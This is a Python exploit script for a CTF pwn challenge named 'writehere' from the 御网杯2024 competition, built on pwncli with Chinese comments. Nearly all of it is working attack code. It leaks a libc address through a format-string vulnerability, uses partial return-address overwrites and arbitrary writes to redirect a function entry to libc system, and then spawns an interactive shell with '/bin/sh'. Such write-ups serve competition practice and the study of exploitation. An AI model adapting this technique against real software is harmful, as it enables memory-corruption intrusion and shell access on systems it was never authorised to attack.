御网杯2024

writehere

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from time import time
from struct import pack
from LibcSearcher import *
cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象，ELF("./pwn")
libc = gift.libc # ELF对象， ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

time_ = (int)(time())

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    libc = ELF("./libc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样，打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #

one_ = [0xe3afe,0xe3b01,0xe3b04]
# - - - - - - - - - - - - - #
def pwn_exp():
    ru("Please enter your name")
    p1 = b'%p'*4
    s(p1)
    ru("0x")
    ru("0x")
    ru("0x")
    libc.address  = int(io.recv(12),16)-18-libc.sym.read
    p1 = p1.ljust(0x18,b'\x00')+p64_ex(0x40121b)[0:6]
    s(p1)
    ru("Congratulations on completing a big step")
    p2 = p64_ex(0x404038)
    s(p2)
    p3 = p64_ex(0x4010D0)
    s(p3)
    #0x403e18
    ru("Please enter your name")
    p1 = b'%p'*4
    s(p1)
    ru("0x")
    ru("0x")
    ru("0x")
    p1 = p1.ljust(0x18,b'A')+p64_ex(0x40121b)[0:6]
    s(p1)
    ru("Congratulations on completing a big step")
    p2 = p64_ex(0x404020)
    s(p2)
    p3 = p64_ex(libc.sym.system)
    s(p3)
    ru("Please enter your name")
    sl(b"/bin/sh\x00")
#log
    
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    #log.success('heap_bae:'+hex(heap_base))

if __name__ == '__main__':
    pwn_exp()
    io.interactive()